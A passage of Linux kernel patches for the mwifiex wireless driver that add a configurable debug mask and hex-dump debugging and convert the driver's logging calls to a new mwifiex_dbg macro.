+ MWIFIEX_DBG_CMD = 0x00000010, + MWIFIEX_DBG_EVENT = 0x00000020, + MWIFIEX_DBG_INTR = 0x00000040, + MWIFIEX_DBG_IOCTL = 0x00000080, + + MWIFIEX_DBG_MPA_D = 0x00008000, + MWIFIEX_DBG_DAT_D = 0x00010000, + MWIFIEX_DBG_CMD_D = 0x00020000, + MWIFIEX_DBG_EVT_D = 0x00040000, + MWIFIEX_DBG_FW_D = 0x00080000, + MWIFIEX_DBG_IF_D = 0x00100000, + + MWIFIEX_DBG_ENTRY = 0x10000000, + MWIFIEX_DBG_WARN = 0x20000000, + MWIFIEX_DBG_INFO = 0x40000000, + MWIFIEX_DBG_DUMP = 0x80000000, + + MWIFIEX_DBG_ANY = 0xffffffff +}; + +#define MWIFIEX_DEFAULT_DEBUG_MASK (MWIFIEX_DBG_MSG | \ + MWIFIEX_DBG_FATAL | \ + MWIFIEX_DBG_ERROR) + +#define mwifiex_dbg(adapter, dbg_mask, fmt, args...) \ +do { \ + if ((adapter)->debug_mask & MWIFIEX_DBG_##dbg_mask) \ + if ((adapter)->dev) \ + dev_info((adapter)->dev, fmt, ## args); \ +} while (0) + struct mwifiex_dbg { u32 num_cmd_host_to_card_failure; u32 num_cmd_sleep_cfm_host_to_card_failure; @@ -751,6 +790,7 @@ struct mwifiex_if_ops { struct mwifiex_adapter { u8 iface_type; + unsigned int debug_mask; struct mwifiex_iface_comb iface_limit; struct mwifiex_iface_comb curr_iface_comb; struct mwifiex_private *priv[MWIFIEX_MAX_BSS_NUM]; diff --git a/drivers/net/wireless/mwifiex/util.c b/drivers/net/wireless/mwifiex/util.c index 9482d955c384..22d93af83cfe 100644 --- a/drivers/net/wireless/mwifiex/util.c +++ b/drivers/net/wireless/mwifiex/util.c @@ -26,6 +26,8 @@ #include "11n.h" static struct mwifiex_debug_data items[] = { + {"debug_mask", item_size(debug_mask), + item_addr(debug_mask), 1}, {"int_counter", item_size(int_counter), item_addr(int_counter), 1}, {"wmm_ac_vo", item_size(packets_out[WMM_AC_VO]), @@ -178,6 +180,7 @@ int mwifiex_get_debug_info(struct mwifiex_private *priv, struct mwifiex_adapter *adapter = priv->adapter; if (info) { + info->debug_mask = adapter->debug_mask; memcpy(info->packets_out, priv->wmm.packets_out, sizeof(priv->wmm.packets_out)); From 868093a9df7580d6d50639d58f2c6e334dd73622 Mon Sep 17 00:00:00 2001 From: Zhaoyang Liu Date: Tue, 12 May 2015 00:48:19 +0530 Subject: [PATCH 204/872] mwifiex: add dump data debug support This patch is to add support for data hexdump debug feature. It is controlled by level debug_mask in adapter structure. Signed-off-by: Zhaoyang Liu Signed-off-by: Cathy Luo Signed-off-by: Avinash Patil Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/cmdevt.c | 11 +++++++++-- drivers/net/wireless/mwifiex/main.h | 9 +++++++++ drivers/net/wireless/mwifiex/pcie.c | 2 +- drivers/net/wireless/mwifiex/scan.c | 3 +++ drivers/net/wireless/mwifiex/txrx.c | 5 +++++ 5 files changed, 27 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/mwifiex/cmdevt.c b/drivers/net/wireless/mwifiex/cmdevt.c index c5a14ff7eb82..5b197860b584 100644 --- a/drivers/net/wireless/mwifiex/cmdevt.c +++ b/drivers/net/wireless/mwifiex/cmdevt.c @@ -201,6 +201,7 @@ static int mwifiex_dnld_cmd_to_fw(struct mwifiex_private *priv, "cmd: DNLD_CMD: %#x, act %#x, len %d, seqno %#x\n", cmd_code, le16_to_cpu(*(__le16 *) ((u8 *) host_cmd + S_DS_GEN)), cmd_size, le16_to_cpu(host_cmd->seq_num)); + mwifiex_dbg_dump(adapter, CMD_D, "cmd buffer:", host_cmd, cmd_size); if (adapter->iface_type == MWIFIEX_USB) { tmp = cpu_to_le32(MWIFIEX_USB_TYPE_CMD); @@ -286,6 +287,8 @@ static int mwifiex_dnld_sleep_confirm_cmd(struct mwifiex_adapter *adapter) le16_to_cpu(sleep_cfm_buf->action), le16_to_cpu(sleep_cfm_buf->size), le16_to_cpu(sleep_cfm_buf->seq_num)); + mwifiex_dbg_dump(adapter, CMD_D, "SLEEP_CFM buffer: ", sleep_cfm_buf, + le16_to_cpu(sleep_cfm_buf->size)); if (adapter->iface_type == MWIFIEX_USB) { sleep_cfm_tmp = @@ -362,8 +365,9 @@ int mwifiex_alloc_cmd_buffer(struct mwifiex_adapter *adapter) for (i = 0; i < MWIFIEX_NUM_OF_CMD_BUFFER; i++) { cmd_array[i].skb = dev_alloc_skb(MWIFIEX_SIZE_OF_CMD_BUFFER); if (!cmd_array[i].skb) { - dev_err(adapter->dev, "ALLOC_CMD_BUF: out of memory\n"); - return -1; + dev_err(adapter->dev, + "unable to allocate command buffer\n"); + return -ENOMEM; } } @@ -460,6 +464,7 @@ int mwifiex_process_event(struct mwifiex_adapter *adapter) } dev_dbg(adapter->dev, "EVENT: cause: %#x\n", eventcause); + mwifiex_dbg_dump(adapter, EVT_D, "Event Buf:", skb->data, skb->len); if (priv->bss_role == MWIFIEX_BSS_ROLE_UAP) ret = mwifiex_process_uap_event(priv); @@ -826,6 +831,8 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) "cmd: CMD_RESP: 0x%x, result %d, len %d, seqno 0x%x\n", orig_cmdresp_no, cmdresp_result, le16_to_cpu(resp->size), le16_to_cpu(resp->seq_num)); + mwifiex_dbg_dump(adapter, CMD_D, "CMD_RESP buffer:", resp, + le16_to_cpu(resp->size)); if (!(orig_cmdresp_no & HostCmd_RET_BIT)) { dev_err(adapter->dev, "CMD_RESP: invalid cmd resp\n"); diff --git a/drivers/net/wireless/mwifiex/main.h b/drivers/net/wireless/mwifiex/main.h index 6cbbc50126ac..2f5516194e32 100644 --- a/drivers/net/wireless/mwifiex/main.h +++ b/drivers/net/wireless/mwifiex/main.h @@ -186,6 +186,15 @@ do { \ dev_info((adapter)->dev, fmt, ## args); \ } while (0) +#define DEBUG_DUMP_DATA_MAX_LEN 128 +#define mwifiex_dbg_dump(adapter, dbg_mask, str, buf, len) \ +do { \ + if ((adapter)->debug_mask & MWIFIEX_DBG_##dbg_mask) \ + print_hex_dump(KERN_DEBUG, str, \ + DUMP_PREFIX_OFFSET, 16, 1, \ + buf, len, false); \ +} while (0) + struct mwifiex_dbg { u32 num_cmd_host_to_card_failure; u32 num_cmd_sleep_cfm_host_to_card_failure; diff --git a/drivers/net/wireless/mwifiex/pcie.c b/drivers/net/wireless/mwifiex/pcie.c index bcc7751d883c..88bda3f68164 100644 --- a/drivers/net/wireless/mwifiex/pcie.c +++ b/drivers/net/wireless/mwifiex/pcie.c @@ -1721,7 +1721,7 @@ static int mwifiex_pcie_process_event_ready(struct mwifiex_adapter *adapter) len is 2 bytes followed by type which is 2 bytes */ memcpy(&data_len, skb_cmd->data, sizeof(__le16)); evt_len = le16_to_cpu(data_len); - + skb_trim(skb_cmd, evt_len); skb_pull(skb_cmd, INTF_HEADER_LEN); dev_dbg(adapter->dev, "info: Event length: %d\n", evt_len); diff --git a/drivers/net/wireless/mwifiex/scan.c b/drivers/net/wireless/mwifiex/scan.c index 0ffdb7c5afd2..84843d1b0a04 100644 --- a/drivers/net/wireless/mwifiex/scan.c +++ b/drivers/net/wireless/mwifiex/scan.c @@ -2125,6 +2125,9 @@ int mwifiex_handle_event_ext_scan_report(struct mwifiex_private *priv, dev_dbg(adapter->dev, "EXT_SCAN: size %d, returned %d APs...", scan_resp_size, num_of_set); + mwifiex_dbg_dump(adapter, CMD_D, "EXT_SCAN buffer:", buf, + scan_resp_size + + sizeof(struct mwifiex_event_scan_result)); tlv = (struct mwifiex_ie_types_data *)scan_resp; diff --git a/drivers/net/wireless/mwifiex/txrx.c b/drivers/net/wireless/mwifiex/txrx.c index a245f444aeec..73082b51f6e1 100644 --- a/drivers/net/wireless/mwifiex/txrx.c +++ b/drivers/net/wireless/mwifiex/txrx.c @@ -55,6 +55,9 @@ int mwifiex_handle_rx_packet(struct mwifiex_adapter *adapter, return -1; } + mwifiex_dbg_dump(adapter, DAT_D, "rx pkt:", skb->data, + min_t(size_t, skb->len, DEBUG_DUMP_DATA_MAX_LEN)); + memset(rx_info, 0, sizeof(*rx_info)); rx_info->bss_num = priv->bss_num; rx_info->bss_type = priv->bss_type; @@ -112,6 +115,8 @@ int mwifiex_process_tx(struct mwifiex_private *priv, struct sk_buff *skb, skb, tx_param); } } + mwifiex_dbg_dump(adapter, DAT_D, "tx pkt:", skb->data, + min_t(size_t, skb->len, DEBUG_DUMP_DATA_MAX_LEN)); switch (ret) { case -ENOSR: From acebe8c10a6eabdb9c34370a774b5b3fcbae3ff4 Mon Sep 17 00:00:00 2001 From: Zhaoyang Liu Date: Tue, 12 May 2015 00:48:20 +0530 Subject: [PATCH 205/872] mwifiex: change dbg print func to mwifiex_dbg This patch changes all debug print functions from dev_dbg/dev_err/dev_info to mwifiex specific debug functions. Signed-off-by: Zhaoyang Liu Signed-off-by: Cathy Luo Signed-off-by: Avinash Patil Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/11h.c | 48 +- drivers/net/wireless/mwifiex/11n.c | 24 +- drivers/net/wireless/mwifiex/11n_aggr.c | 7 +- drivers/net/wireless/mwifiex/11n_rxreorder.c | 51 +- drivers/net/wireless/mwifiex/cfg80211.c | 462 +++++++++------- drivers/net/wireless/mwifiex/cfp.c | 50 +- drivers/net/wireless/mwifiex/cmdevt.c | 354 +++++++----- drivers/net/wireless/mwifiex/debugfs.c | 3 +- drivers/net/wireless/mwifiex/ethtool.c | 6 +- drivers/net/wireless/mwifiex/init.c | 53 +- drivers/net/wireless/mwifiex/join.c | 208 +++---- drivers/net/wireless/mwifiex/main.c | 109 ++-- drivers/net/wireless/mwifiex/pcie.c | 550 ++++++++++--------- drivers/net/wireless/mwifiex/scan.c | 374 +++++++------ drivers/net/wireless/mwifiex/sdio.c | 424 ++++++++------ drivers/net/wireless/mwifiex/sta_cmd.c | 136 ++--- drivers/net/wireless/mwifiex/sta_cmdresp.c | 181 +++--- drivers/net/wireless/mwifiex/sta_event.c | 130 ++--- drivers/net/wireless/mwifiex/sta_ioctl.c | 145 ++--- drivers/net/wireless/mwifiex/sta_rx.c | 13 +- drivers/net/wireless/mwifiex/sta_tx.c | 18 +- drivers/net/wireless/mwifiex/tdls.c | 86 +-- drivers/net/wireless/mwifiex/txrx.c | 25 +- drivers/net/wireless/mwifiex/uap_cmd.c | 20 +- drivers/net/wireless/mwifiex/uap_event.c | 44 +- drivers/net/wireless/mwifiex/uap_txrx.c | 36 +- drivers/net/wireless/mwifiex/usb.c | 141 +++-- drivers/net/wireless/mwifiex/util.c | 24 +- drivers/net/wireless/mwifiex/wmm.c | 98 ++-- 29 files changed, 2122 insertions(+), 1698 deletions(-) diff --git a/drivers/net/wireless/mwifiex/11h.c b/drivers/net/wireless/mwifiex/11h.c index 3ab87a855122..65cd461c88db 100644 --- a/drivers/net/wireless/mwifiex/11h.c +++ b/drivers/net/wireless/mwifiex/11h.c @@ -134,8 +134,8 @@ void mwifiex_dfs_cac_work_queue(struct work_struct *work) chandef = priv->dfs_chandef; if (priv->wdev.cac_started) { - dev_dbg(priv->adapter->dev, - "CAC timer finished; No radar detected\n"); + mwifiex_dbg(priv->adapter, MSG, + "CAC timer finished; No radar detected\n"); cfg80211_cac_event(priv->netdev, &chandef, NL80211_RADAR_CAC_FINISHED, GFP_KERNEL); @@ -161,9 +161,9 @@ int mwifiex_cmd_issue_chan_report_request(struct mwifiex_private *priv, cr_req->chan_desc.chan_width = radar_params->chandef->width; cr_req->msec_dwell_time = cpu_to_le32(radar_params->cac_time_ms); - dev_dbg(priv->adapter->dev, - "11h: issuing DFS Radar check for channel=%d\n", - radar_params->chandef->chan->hw_value); + mwifiex_dbg(priv->adapter, MSG, + "11h: issuing DFS Radar check for channel=%d\n", + radar_params->chandef->chan->hw_value); return 0; } @@ -174,8 +174,8 @@ int mwifiex_cmd_issue_chan_report_request(struct mwifiex_private *priv, void mwifiex_abort_cac(struct mwifiex_private *priv) { if (priv->wdev.cac_started) { - dev_dbg(priv->adapter->dev, - "Aborting delayed work for CAC.\n"); + mwifiex_dbg(priv->adapter, MSG, + "Aborting delayed work for CAC.\n"); cancel_delayed_work_sync(&priv->dfs_cac_work); cfg80211_cac_event(priv->netdev, &priv->dfs_chandef, NL80211_RADAR_CAC_ABORTED, GFP_KERNEL); @@ -199,7 +199,8 @@ int mwifiex_11h_handle_chanrpt_ready(struct mwifiex_private *priv, sizeof(u32)); if (le32_to_cpu(rpt_event->result) != HostCmd_RESULT_OK) { - dev_err(priv->adapter->dev, "Error in channel report event\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Error in channel report event\n"); return -1; } @@ -212,8 +213,8 @@ int mwifiex_11h_handle_chanrpt_ready(struct mwifiex_private *priv, switch (le16_to_cpu(rpt->header.type)) { case TLV_TYPE_CHANRPT_11H_BASIC: if (rpt->map.radar) { - dev_notice(priv->adapter->dev, - "RADAR Detected on channel %d!\n", + mwifiex_dbg(priv->adapter, MSG, + "RADAR Detected on channel %d!\n", priv->dfs_chandef.chan->hw_value); cancel_delayed_work_sync(&priv->dfs_cac_work); cfg80211_cac_event(priv->netdev, @@ -242,16 +243,17 @@ int mwifiex_11h_handle_radar_detected(struct mwifiex_private *priv, rdr_event = (void *)(skb->data + sizeof(u32)); if (le32_to_cpu(rdr_event->passed)) { - dev_notice(priv->adapter->dev, - "radar detected; indicating kernel\n"); + mwifiex_dbg(priv->adapter, MSG, + "radar detected; indicating kernel\n"); cfg80211_radar_event(priv->adapter->wiphy, &priv->dfs_chandef, GFP_KERNEL); - dev_dbg(priv->adapter->dev, "regdomain: %d\n", - rdr_event->reg_domain); - dev_dbg(priv->adapter->dev, "radar detection type: %d\n", - rdr_event->det_type); + mwifiex_dbg(priv->adapter, MSG, "regdomain: %d\n", + rdr_event->reg_domain); + mwifiex_dbg(priv->adapter, MSG, "radar detection type: %d\n", + rdr_event->det_type); } else { - dev_dbg(priv->adapter->dev, "false radar detection event!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "false radar detection event!\n"); } return 0; @@ -276,20 +278,20 @@ void mwifiex_dfs_chan_sw_work_queue(struct work_struct *work) bss_cfg = &priv->bss_cfg; if (!bss_cfg->beacon_period) { - dev_err(priv->adapter->dev, - "channel switch: AP already stopped\n"); + mwifiex_dbg(priv->adapter, ERROR, + "channel switch: AP already stopped\n"); return; } mwifiex_uap_set_channel(bss_cfg, priv->dfs_chandef); if (mwifiex_config_start_uap(priv, bss_cfg)) { - dev_dbg(priv->adapter->dev, - "Failed to start AP after channel switch\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to start AP after channel switch\n"); return; } - dev_notice(priv->adapter->dev, - "indicating channel switch completion to kernel\n"); + mwifiex_dbg(priv->adapter, MSG, + "indicating channel switch completion to kernel\n"); cfg80211_ch_switch_notify(priv->netdev, &priv->dfs_chandef); } diff --git a/drivers/net/wireless/mwifiex/11n.c b/drivers/net/wireless/mwifiex/11n.c index 433bd6837c79..8422986cd7a9 100644 --- a/drivers/net/wireless/mwifiex/11n.c +++ b/drivers/net/wireless/mwifiex/11n.c @@ -42,7 +42,7 @@ int mwifiex_fill_cap_info(struct mwifiex_private *priv, u8 radio_type, priv->wdev.wiphy->bands[radio_type]; if (WARN_ON_ONCE(!sband)) { - dev_err(priv->adapter->dev, "Invalid radio type!\n"); + mwifiex_dbg(priv->adapter, ERROR, "Invalid radio type!\n"); return -EINVAL; } @@ -184,7 +184,7 @@ int mwifiex_ret_11n_addba_req(struct mwifiex_private *priv, tx_ba_tbl = mwifiex_get_ba_tbl(priv, tid, add_ba_rsp->peer_mac_addr); if (tx_ba_tbl) { - dev_dbg(priv->adapter->dev, "info: BA stream complete\n"); + mwifiex_dbg(priv->adapter, EVENT, "info: BA stream complete\n"); tx_ba_tbl->ba_status = BA_SETUP_COMPLETE; if ((block_ack_param_set & BLOCKACKPARAM_AMSDU_SUPP_MASK) && priv->add_ba_param.tx_amsdu && @@ -197,7 +197,7 @@ int mwifiex_ret_11n_addba_req(struct mwifiex_private *priv, ra_list->ba_status = BA_SETUP_COMPLETE; } } else { - dev_err(priv->adapter->dev, "BA stream not created\n"); + mwifiex_dbg(priv->adapter, ERROR, "BA stream not created\n"); } return 0; @@ -224,7 +224,8 @@ int mwifiex_cmd_recfg_tx_buf(struct mwifiex_private *priv, tx_buf->action = cpu_to_le16(action); switch (action) { case HostCmd_ACT_GEN_SET: - dev_dbg(priv->adapter->dev, "cmd: set tx_buf=%d\n", *buf_size); + mwifiex_dbg(priv->adapter, CMD, + "cmd: set tx_buf=%d\n", *buf_size); tx_buf->buff_size = cpu_to_le16(*buf_size); break; case HostCmd_ACT_GEN_GET: @@ -466,7 +467,8 @@ void mwifiex_11n_delete_tx_ba_stream_tbl_entry(struct mwifiex_private *priv, mwifiex_is_tx_ba_stream_ptr_valid(priv, tx_ba_tsr_tbl)) return; - dev_dbg(priv->adapter->dev, "info: tx_ba_tsr_tbl %p\n", tx_ba_tsr_tbl); + mwifiex_dbg(priv->adapter, INFO, + "info: tx_ba_tsr_tbl %p\n", tx_ba_tsr_tbl); list_del(&tx_ba_tsr_tbl->list); @@ -563,7 +565,7 @@ int mwifiex_send_addba(struct mwifiex_private *priv, int tid, u8 *peer_mac) unsigned long flags; u16 block_ack_param_set; - dev_dbg(priv->adapter->dev, "cmd: %s: tid %d\n", __func__, tid); + mwifiex_dbg(priv->adapter, CMD, "cmd: %s: tid %d\n", __func__, tid); if ((GET_BSS_ROLE(priv) == MWIFIEX_BSS_ROLE_STA) && ISSUPP_TDLS_ENABLED(priv->adapter->fw_cap_info) && @@ -575,9 +577,9 @@ int mwifiex_send_addba(struct mwifiex_private *priv, int tid, u8 *peer_mac) sta_ptr = mwifiex_get_sta_entry(priv, peer_mac); if (!sta_ptr) { spin_unlock_irqrestore(&priv->sta_list_spinlock, flags); - dev_warn(priv->adapter->dev, - "BA setup with unknown TDLS peer %pM!\n", - peer_mac); + mwifiex_dbg(priv->adapter, ERROR, + "BA setup with unknown TDLS peer %pM!\n", + peer_mac); return -1; } if (sta_ptr->is_11ac_enabled) @@ -706,8 +708,8 @@ int mwifiex_get_tx_ba_stream_tbl(struct mwifiex_private *priv, spin_lock_irqsave(&priv->tx_ba_stream_tbl_lock, flags); list_for_each_entry(tx_ba_tsr_tbl, &priv->tx_ba_stream_tbl_ptr, list) { rx_reo_tbl->tid = (u16) tx_ba_tsr_tbl->tid; - dev_dbg(priv->adapter->dev, "data: %s tid=%d\n", - __func__, rx_reo_tbl->tid); + mwifiex_dbg(priv->adapter, DATA, "data: %s tid=%d\n", + __func__, rx_reo_tbl->tid); memcpy(rx_reo_tbl->ra, tx_ba_tsr_tbl->ra, ETH_ALEN); rx_reo_tbl->amsdu = tx_ba_tsr_tbl->amsdu; rx_reo_tbl++; diff --git a/drivers/net/wireless/mwifiex/11n_aggr.c b/drivers/net/wireless/mwifiex/11n_aggr.c index 6183e255e62a..f7c717253a66 100644 --- a/drivers/net/wireless/mwifiex/11n_aggr.c +++ b/drivers/net/wireless/mwifiex/11n_aggr.c @@ -187,7 +187,6 @@ mwifiex_11n_aggregate_pkt(struct mwifiex_private *priv, skb_aggr = mwifiex_alloc_dma_align_buf(adapter->tx_buf_size, GFP_ATOMIC | GFP_DMA); if (!skb_aggr) { - dev_err(adapter->dev, "%s: alloc skb_aggr\n", __func__); spin_unlock_irqrestore(&priv->wmm.ra_list_spinlock, ra_list_flags); return -1; @@ -297,13 +296,13 @@ mwifiex_11n_aggregate_pkt(struct mwifiex_private *priv, tx_info_aggr->flags |= MWIFIEX_BUF_FLAG_REQUEUED_PKT; spin_unlock_irqrestore(&priv->wmm.ra_list_spinlock, ra_list_flags); - dev_dbg(adapter->dev, "data: -EBUSY is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -EBUSY is returned\n"); break; case -1: if (adapter->iface_type != MWIFIEX_PCIE) adapter->data_sent = false; - dev_err(adapter->dev, "%s: host_to_card failed: %#x\n", - __func__, ret); + mwifiex_dbg(adapter, ERROR, "%s: host_to_card failed: %#x\n", + __func__, ret); adapter->dbg.num_tx_host_to_card_failure++; mwifiex_write_data_complete(adapter, skb_aggr, 1, ret); return 0; diff --git a/drivers/net/wireless/mwifiex/11n_rxreorder.c b/drivers/net/wireless/mwifiex/11n_rxreorder.c index f75f8acfaca0..39d7a957674c 100644 --- a/drivers/net/wireless/mwifiex/11n_rxreorder.c +++ b/drivers/net/wireless/mwifiex/11n_rxreorder.c @@ -51,8 +51,8 @@ static int mwifiex_11n_dispatch_amsdu_pkt(struct mwifiex_private *priv, rx_skb = __skb_dequeue(&list); ret = mwifiex_recv_packet(priv, rx_skb); if (ret == -1) - dev_err(priv->adapter->dev, - "Rx of A-MSDU failed"); + mwifiex_dbg(priv->adapter, ERROR, + "Rx of A-MSDU failed"); } return 0; } @@ -304,7 +304,7 @@ mwifiex_flush_data(unsigned long context) if (seq_num < 0) return; - dev_dbg(ctx->priv->adapter->dev, "info: flush data %d\n", seq_num); + mwifiex_dbg(ctx->priv->adapter, INFO, "info: flush data %d\n", seq_num); start_win = (ctx->ptr->start_win + seq_num + 1) & (MAX_TID_VALUE - 1); mwifiex_11n_dispatch_pkt_until_start_win(ctx->priv, ctx->ptr, start_win); @@ -367,8 +367,9 @@ mwifiex_11n_create_rx_reorder_tbl(struct mwifiex_private *priv, u8 *ta, } spin_unlock_irqrestore(&priv->sta_list_spinlock, flags); - dev_dbg(priv->adapter->dev, "info: last_seq=%d start_win=%d\n", - last_seq, new_node->start_win); + mwifiex_dbg(priv->adapter, INFO, + "info: last_seq=%d start_win=%d\n", + last_seq, new_node->start_win); if (last_seq != MWIFIEX_DEF_11N_RX_SEQ_NUM && last_seq >= new_node->start_win) { @@ -382,8 +383,8 @@ mwifiex_11n_create_rx_reorder_tbl(struct mwifiex_private *priv, u8 *ta, GFP_KERNEL); if (!new_node->rx_reorder_ptr) { kfree((u8 *) new_node); - dev_err(priv->adapter->dev, - "%s: failed to alloc reorder_ptr\n", __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: failed to alloc reorder_ptr\n", __func__); return; } @@ -467,9 +468,9 @@ int mwifiex_cmd_11n_addba_rsp_gen(struct mwifiex_private *priv, cmd_addba_req->peer_mac_addr); if (!sta_ptr) { spin_unlock_irqrestore(&priv->sta_list_spinlock, flags); - dev_warn(priv->adapter->dev, - "BA setup with unknown TDLS peer %pM!\n", - cmd_addba_req->peer_mac_addr); + mwifiex_dbg(priv->adapter, ERROR, + "BA setup with unknown TDLS peer %pM!\n", + cmd_addba_req->peer_mac_addr); return -1; } if (sta_ptr->is_11ac_enabled) @@ -573,14 +574,14 @@ int mwifiex_11n_rx_reorder_pkt(struct mwifiex_private *priv, } if (tbl->flags & RXREOR_FORCE_NO_DROP) { - dev_dbg(priv->adapter->dev, - "RXREOR_FORCE_NO_DROP when HS is activated\n"); + mwifiex_dbg(priv->adapter, INFO, + "RXREOR_FORCE_NO_DROP when HS is activated\n"); tbl->flags &= ~RXREOR_FORCE_NO_DROP; } else if (init_window_shift && seq_num < start_win && seq_num >= tbl->init_win) { - dev_dbg(priv->adapter->dev, - "Sender TID sequence number reset %d->%d for SSN %d\n", - start_win, seq_num, tbl->init_win); + mwifiex_dbg(priv->adapter, INFO, + "Sender TID sequence number reset %d->%d for SSN %d\n", + start_win, seq_num, tbl->init_win); tbl->start_win = start_win = seq_num; end_win = ((start_win + win_size) - 1) & (MAX_TID_VALUE - 1); } else { @@ -668,23 +669,23 @@ mwifiex_del_ba_tbl(struct mwifiex_private *priv, int tid, u8 *peer_mac, else cleanup_rx_reorder_tbl = (initiator) ? false : true; - dev_dbg(priv->adapter->dev, "event: DELBA: %pM tid=%d initiator=%d\n", - peer_mac, tid, initiator); + mwifiex_dbg(priv->adapter, EVENT, "event: DELBA: %pM tid=%d initiator=%d\n", + peer_mac, tid, initiator); if (cleanup_rx_reorder_tbl) { tbl = mwifiex_11n_get_rx_reorder_tbl(priv, tid, peer_mac); if (!tbl) { - dev_dbg(priv->adapter->dev, - "event: TID, TA not found in table\n"); + mwifiex_dbg(priv->adapter, EVENT, + "event: TID, TA not found in table\n"); return; } mwifiex_del_rx_reorder_entry(priv, tbl); } else { ptx_tbl = mwifiex_get_ba_tbl(priv, tid, peer_mac); if (!ptx_tbl) { - dev_dbg(priv->adapter->dev, - "event: TID, RA not found in table\n"); + mwifiex_dbg(priv->adapter, EVENT, + "event: TID, RA not found in table\n"); return; } ra_list = mwifiex_wmm_get_ralist_node(priv, tid, peer_mac); @@ -721,8 +722,8 @@ int mwifiex_ret_11n_addba_resp(struct mwifiex_private *priv, * the stream */ if (le16_to_cpu(add_ba_rsp->status_code) != BA_RESULT_SUCCESS) { - dev_err(priv->adapter->dev, "ADDBA RSP: failed %pM tid=%d)\n", - add_ba_rsp->peer_mac_addr, tid); + mwifiex_dbg(priv->adapter, ERROR, "ADDBA RSP: failed %pM tid=%d)\n", + add_ba_rsp->peer_mac_addr, tid); tbl = mwifiex_11n_get_rx_reorder_tbl(priv, tid, add_ba_rsp->peer_mac_addr); @@ -746,8 +747,8 @@ int mwifiex_ret_11n_addba_resp(struct mwifiex_private *priv, tbl->amsdu = false; } - dev_dbg(priv->adapter->dev, - "cmd: ADDBA RSP: %pM tid=%d ssn=%d win_size=%d\n", + mwifiex_dbg(priv->adapter, CMD, + "cmd: ADDBA RSP: %pM tid=%d ssn=%d win_size=%d\n", add_ba_rsp->peer_mac_addr, tid, add_ba_rsp->ssn, win_size); return 0; diff --git a/drivers/net/wireless/mwifiex/cfg80211.c b/drivers/net/wireless/mwifiex/cfg80211.c index bf9020ff2d33..4eecedadefbf 100644 --- a/drivers/net/wireless/mwifiex/cfg80211.c +++ b/drivers/net/wireless/mwifiex/cfg80211.c @@ -104,11 +104,11 @@ mwifiex_cfg80211_del_key(struct wiphy *wiphy, struct net_device *netdev, const u8 *peer_mac = pairwise ? mac_addr : bc_mac; if (mwifiex_set_encode(priv, NULL, NULL, 0, key_index, peer_mac, 1)) { - wiphy_err(wiphy, "deleting the crypto keys\n"); + mwifiex_dbg(priv->adapter, ERROR, "deleting the crypto keys\n"); return -EFAULT; } - wiphy_dbg(wiphy, "info: crypto keys deleted\n"); + mwifiex_dbg(priv->adapter, INFO, "info: crypto keys deleted\n"); return 0; } @@ -163,7 +163,7 @@ mwifiex_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev, struct mwifiex_private *priv = mwifiex_netdev_get_priv(wdev->netdev); if (!buf || !len) { - wiphy_err(wiphy, "invalid buffer and length\n"); + mwifiex_dbg(priv->adapter, ERROR, "invalid buffer and length\n"); return -EFAULT; } @@ -172,8 +172,8 @@ mwifiex_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev, ieee80211_is_probe_resp(mgmt->frame_control)) { /* Since we support offload probe resp, we need to skip probe * resp in AP or GO mode */ - wiphy_dbg(wiphy, - "info: skip to send probe resp in AP or GO mode\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: skip to send probe resp in AP or GO mode\n"); return 0; } @@ -183,7 +183,8 @@ mwifiex_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev, pkt_len + sizeof(pkt_len)); if (!skb) { - wiphy_err(wiphy, "allocate skb failed for management frame\n"); + mwifiex_dbg(priv->adapter, ERROR, + "allocate skb failed for management frame\n"); return -ENOMEM; } @@ -206,7 +207,7 @@ mwifiex_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev, mwifiex_queue_tx_pkt(priv, skb); - wiphy_dbg(wiphy, "info: management frame transmitted\n"); + mwifiex_dbg(priv->adapter, INFO, "info: management frame transmitted\n"); return 0; } @@ -231,7 +232,7 @@ mwifiex_cfg80211_mgmt_frame_register(struct wiphy *wiphy, mwifiex_send_cmd(priv, HostCmd_CMD_MGMT_FRAME_REG, HostCmd_ACT_GEN_SET, 0, &priv->mgmt_frame_mask, false); - wiphy_dbg(wiphy, "info: mgmt frame registered\n"); + mwifiex_dbg(priv->adapter, INFO, "info: mgmt frame registered\n"); } } @@ -248,13 +249,14 @@ mwifiex_cfg80211_remain_on_channel(struct wiphy *wiphy, int ret; if (!chan || !cookie) { - wiphy_err(wiphy, "Invalid parameter for ROC\n"); + mwifiex_dbg(priv->adapter, ERROR, "Invalid parameter for ROC\n"); return -EINVAL; } if (priv->roc_cfg.cookie) { - wiphy_dbg(wiphy, "info: ongoing ROC, cookie = 0x%llx\n", - priv->roc_cfg.cookie); + mwifiex_dbg(priv->adapter, INFO, + "info: ongoing ROC, cookie = 0x%llx\n", + priv->roc_cfg.cookie); return -EBUSY; } @@ -269,7 +271,8 @@ mwifiex_cfg80211_remain_on_channel(struct wiphy *wiphy, cfg80211_ready_on_channel(wdev, *cookie, chan, duration, GFP_ATOMIC); - wiphy_dbg(wiphy, "info: ROC, cookie = 0x%llx\n", *cookie); + mwifiex_dbg(priv->adapter, INFO, + "info: ROC, cookie = 0x%llx\n", *cookie); } return ret; @@ -298,7 +301,8 @@ mwifiex_cfg80211_cancel_remain_on_channel(struct wiphy *wiphy, memset(&priv->roc_cfg, 0, sizeof(struct mwifiex_roc_cfg)); - wiphy_dbg(wiphy, "info: cancel ROC, cookie = 0x%llx\n", cookie); + mwifiex_dbg(priv->adapter, INFO, + "info: cancel ROC, cookie = 0x%llx\n", cookie); } return ret; @@ -344,8 +348,8 @@ mwifiex_cfg80211_set_power_mgmt(struct wiphy *wiphy, u32 ps_mode; if (timeout) - wiphy_dbg(wiphy, - "info: ignore timeout value for IEEE Power Save\n"); + mwifiex_dbg(priv->adapter, INFO, 